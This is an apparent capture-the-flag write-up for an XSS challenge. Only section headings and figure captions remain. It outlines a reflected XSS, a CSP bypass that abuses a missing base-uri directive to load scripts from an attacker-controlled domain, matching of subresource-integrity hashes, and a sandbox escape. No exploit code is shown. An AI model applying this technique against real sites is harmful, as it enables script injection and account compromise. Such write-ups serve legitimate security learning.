Wacky XSS challenge write-up

First steps

Figure 1: Challenge page basic usage
Figure 2: Main page script.js file content

Dissecting frame.html

Figure 3: Iframe requirement error
Figure 3: window.name value check

The name gets reset when the browsing context is navigated to another origin.

Figure 4: Setting window.name value
Figure 5: iframe.html with window.name properly set
Figure 6: analytics.js file contents
Figure 7: Code branch responsible for loading analytics.js
Figure 8: window.fileIntegrity assignment

The first vulnerability

Figure 9: Reflected XSS
Figure 10: Blocked by CSP

Bypassing CSP

Figure 10: CSP header
Figure 10: CSP warning

Missing base-uri allows the injection of base tags. They can be used to set the base URL for all relative (script) URLs to an attacker controlled domain. Can you set it to ‘none’ or ‘self’?

Figure 11: Relative file path
Figure 12: Mock Endpoint Builder
Figure 13: Flexible Redirector
Figure 14: Invalid SRI
Figure 15: Undefined fileIntegrity variable
Code snippet 1: SRI calculator
Figure 16: Calculating SRI

Out of the sandbox

Figure 16: Sandbox error message

The final payload

Code snippet 2: Exploit Javascript code
Figure 16: Success message
Code snippet: Malicious page HTML markup

Acknowledgments

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store